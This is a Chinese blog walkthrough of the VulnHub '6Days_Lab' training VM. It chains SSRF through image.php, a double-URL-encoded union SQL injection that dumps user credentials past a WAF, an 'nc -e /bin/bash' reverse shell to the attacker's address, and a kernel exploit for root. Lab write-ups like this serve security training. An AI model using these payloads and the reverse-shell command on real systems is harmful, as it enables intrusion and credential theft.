vulnhub靶场,6Days_Lab-v1.0.1

最新推荐文章于 2024-02-21 21:00:05 发布
最新推荐文章于 2024-02-21 21:00:05 发布
阅读量434 收藏 1
点赞数
分类专栏: 靶场实战 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/118573194
版权

vulnhub靶场,6Days_Lab-v1.0.1

环境准备

靶机下载地址:https://www.vulnhub.com/entry/6days-lab-11,156/#flags
目标:获取根目录下的flag
下载好靶机后,使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

1、获取靶机IP地址
kali攻击机输入netdiscover,不添加任何参数,会默认扫描机器网卡上的ip值的所有网段,获取到的靶机IP地址为192.168.58.143

2、查看靶机端口开启情况
kali攻击机输入nmap -v -Pn 192.168.58.143
-v:显示详细信息
-Pn:不使用ping扫描

如图所示,对方开启了22、80、8080端口
3、进入web网站查看
浏览器访问192.168.58.143的80端口

发现是一个ips(入侵防御系统)的界面,根据他的提示输入折扣码试试

显示代码已过期,在折扣码后面加入一个单引号看看是否存在SQL注入

意思为恶意请求被WAF阻挡。所以我们需要去找其他的方法去突破
查看页面源代码,发现image.php页面会进行引用图片

访问这个页面试试

这里感觉可能存在ssrf,将src后面改为index.php发现并没有拦截也没有报错,说明是存在ssrf漏洞的

4、使用dirb进行网站目录结果扫描

漏洞利用

1、通过前面信息收集的过程发现网站存在ssrf漏洞,但是页面并没有显示出来网站主页的源码,使用burpsuite抓包试试看

这里是成功回显出了网站主页的源码
2、查看passwd文件信息,得到靶机有账户user,andrea

3、查看config.php文件,得到数据库账号、密码、数据库名信息

4、查看其他文件发现均会被ips(入侵防御系统)拦截


5、查看apache默认配置信息

发现在apache默认文件中,发现网站实际就是在8080端口,只接受本地连接,然后转发到80端口,通过配置信息获得的消息,可以发现网站直接跟mysql数据库连接,存在SQL注入,两次url编码即可绕过

6、利用python,将注入的SQL语句经过两次url编码即可,使用ssrf加SQL注入拿到登入密码
7、查看为数字型还是字符型

from urllib.parse import quote
print(quote(quote("aa'")))    

结果:aa%2527


显示促销码无效

from urllib.parse import quote
print(quote(quote("aa'#")))    

结果:aa%2527%2523


发现能成功闭合,说明为字符型注入,闭合方式为’#
8、查看字段数

from urllib.parse import quote
print(quote(quote("aa' order by 2#")))    

结果:aa%2527%2520order%2520by%25202%2523


from urllib.parse import quote
print(quote(quote("aa' order by 3#")))    

结果:aa%2527%2520order%2520by%25203%2523


字段数为2的时候返回正常,字段数为3的时候返回促销码无效。所以判断字段数为2
9、查看回显位置

from urllib.parse import quote
print(quote(quote("aa' union select 1,2#")))    

结果:aa%2527%2520union%2520select%25201%252C2%2523


所以判断1的位置是有回显的
10、查看当前库

from urllib.parse import quote
print(quote(quote("aa' union select database(),2#")))    

结果:aa%2527%2520union%2520select%2520database%2528%2529%252C2%2523


所以当前库为fancydb
11、查看fancydb库下的所有表

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#")))    

结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%252C2%2523


12、查看users表下的所有字段

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),2#")))

结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_name%253D%2527users%2527%2529%252C2%2523


13、查看username和password字段的值

from urllib.parse import quote
print(quote(quote("aa' union select (select group_concat(concat_ws('~',username,password)) from users),2#")))

结果:aa%2527%2520union%2520select%2520%2528select%2520group_concat%2528concat_ws%2528%2527~%2527%252Cusername%252Cpassword%2529%2529%2520from%2520users%2529%252C2%2523


14、成功得到账号密码,由前面信息收集可知靶机开启了22端口,使用ssh连接输入账号密码成功连接

但是发现输入一些命令并没有回显

15、可能是回显信息丢失,尝试反弹shell
攻击机重新打开一个终端,输入nc -lvvp 1111,监听本地端口

然后在靶机上执行nc -e /bin/bash 192.168.58.130 1111

可以看到监听的这边成功连接了

使用python反弹一个原始命令行

python -c 'import pty;pty.spawn("/bin/bash")'

权限提升

1、查看当前权限,发现只是一个普通的权限

2、查看当前系统内核,发现系统内核版本为3.13.0

3、使用kali搜索3.13.0版本可用的exp

4、开启kali的apache服务,将攻击脚本放到网站的根目录下面


5、在反弹的shell中下载攻击脚本

6、使用攻击脚本进行提权
因为攻击脚本是用c语言编写的,所以需要使用gcc对攻击脚本进行编译

输入./exp开启攻击,成功提升为root权限

7、提权成功后,切换到系统根目录,发现flag文件,发现为可执行脚本,./flag执行,得到flag

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【甄选靶场Vulnhub百个项目渗透——项目四十五:bulldog-1(waf绕过)
人间体佐菲的博客
10-21 622
【甄选靶场Vulnhub百个项目渗透——45、项目四十五:bulldog-1(waf绕过)
vulnhub靶机--6Day_Lab-v1.0.1
Tauil的博客
08-01 250
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入。双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞。但是没有回显内容,尝试进行反弹shell,在原终端输入。.....
vulnhub靶场之Deathnote
最新发布
qq_58091216的博客
02-21 1050
现在我们知道用户名,不知道密码,我们前面扫描到robots.txt,有一个提示说在important.jpg添加了提示,那么我们就在网站图片上面找。发现了文件的路径获得密码字典,那么肯定是有用的,我们想到22端口是开放的,我们可以试试爆破ssh。首先,我们进入fake-notebook-rule,发现了2个文件,一个是加密的数字,一个是提示。我们查看根目录下的内容,发现了user.txt文件,我们进行查看。我们可以看到登录成功,我们进行查看,看有没有可以利用的地方。
【甄选靶场Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)
人间体佐菲的博客
09-26 988
Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)信息安全,网络安全,渗透测试
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 1385
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
6Days_Lab靶机
底层社会中的弱智
07-06 269
总结放在前面: 本次的突破点是一张图片的包含出错引发的文件包含漏洞以及ssrf漏洞 <img src=http://xxxxxx/xxxx/xxx.jpg> 存在于image.php?src=http://xxx.com/xxx.jpg 刚看到这个页面以为是远程文件包含,结果是个本地文件包含 查看到配置文件,sql查看语句 通过端口的8080以及apache的配置信息看到8080是实际的监听端口而80是转发的端口 所以出现了ssrf漏洞 这里是实际的注入点 http://127.
geronimo-jta_1.0.1B_spec-1.0.1.jar
02-24
java运行依赖jar包
geronimo-j2ee-management_1.1_spec-1.0.1-API文档-中文版.zip
04-08
赠送原API文档:geronimo-j2ee-management_1.1_spec-1.0.1-javadoc.jar; 赠送源代码:geronimo-j2ee-management_1.1_spec-1.0.1-sources.jar; 包含翻译后的API文档:geronimo-j2ee-management_1.1_spec-1.0.1-...
GPS_System_Protocol_Discovery_Mechanism-v1.0.1.pdf
06-05
sim卡平台开发
GaussDB_100_1.0.1-DATABASE-REDHAT-64bit.tar.gz
04-14
guassdb100在redhat上安装包,单机部署的包,安装步骤请看我的文中介绍,经过大量实验搭建总结出来的文档
exfat-utils-1.0.1.tar.gz_exfat_exfat utils_exfat-utils_exfat-uti
07-15
exfat 文件系统linux格式化代码,非常好用,直接交叉编译,就能使用,快速格式化代码
vulnhub之GeminiInc v2
weixin_54431413的博客
06-28 510
涉及burp配置代理,burp验证码爆破,用到了鱼叉一对一攻击,token值的提取。403拒绝访问,WAF的绕过。命令注入,有黑名单验证,使用tab的%09绕过拿到shell,写入公钥获得权限回显更好的webshell,拿到redis数据库密码,之后对redis写入公钥,免密登录,来提权。...
VulnHub——DC-5(具体漏洞详解)
高野02blog
12-29 1065
DC-5 这是DC-5的描述,从中得到一些关键信息。 开始 nmap扫描 确定IP地址后端口扫描 发现80端口 使用kali自带工具dirbuster遍历目录 AWVS对网站扫描并没发现重大漏洞 发现只有以下这个界面存在交互 访问footer.php页面时发现了描述中会随着页面刷新改变的东西 我们猜测thankyou.php中incloude()包含了footer.php, 如果是动态包含的路径就可能存在LFI漏洞 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器
漏洞靶场实战-Vuluhub medium_socnet
ZL_1618的博客
01-04 841
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
kali执行php代码的exp,Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP
weixin_42398151的博客
03-23 436
一、漏洞分析1.漏洞背景:1)官方说明:It is possible to perform a RCE attack with amalicious field value when using the Struts 2 Struts 1 plugin and it's a Struts1 action and the value is a part of a message presented ...
6Days_Lab-v1.0.1 - linux
战神/calmness的博客
01-22 364
目录 Download 信息收集 目录遍历 文件包含 调用了src函数 账户密码配置文件 passwd信息 查看apache默认配置信息 Python 通过ssrf+sql注入 获取当前数据库中的表 获取表中字段名 获取所需账号密码信息 SSH perl反弹shell 内核提权 搜索exp 参考链接 Download Back to the Top Please remember that VulnHub is a free community resource..
vulnhub靶场2:Web machine(N7)
Genarior的专栏
03-13 341
vulnhub靶场2:Webmachine(N7)
vulnhub--hackme2-DHCP
weixin_45922278的博客
02-24 883
描述 “ hackme2”是中等难度级别的框。这是hackme系列的第二部分,其中更多的控制措施可以阻止恶意攻击。此外,您还必须开箱即用,以利用漏洞。目标是通过Web漏洞获得受限的特权访问,然后特权以root用户身份升级。该实验室的创建是为了模拟现实世界中的网络漏洞。 “ hackme2”使用DHCP并可能在mysqld自行关闭(非常罕见的情况)的情况下,尝试强制重启机器,并且随后应能正常工作。 https://idc.wanyunshuju.com/vul/1947.html 一、信息...
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2179
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
gaussdb_100_1.0.1-database-redhat-64bit.tar.gz
07-14
gaussdb_100_1.0.1-database-redhat-64bit.tar.gz 是一个压缩包文件的名称。这个文件似乎是一个 Redhat 操作系统下的数据库软件。根据名称中的 "gaussdb",可以猜测它是一种与高斯分布数据库相关的软件。其中 "100_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值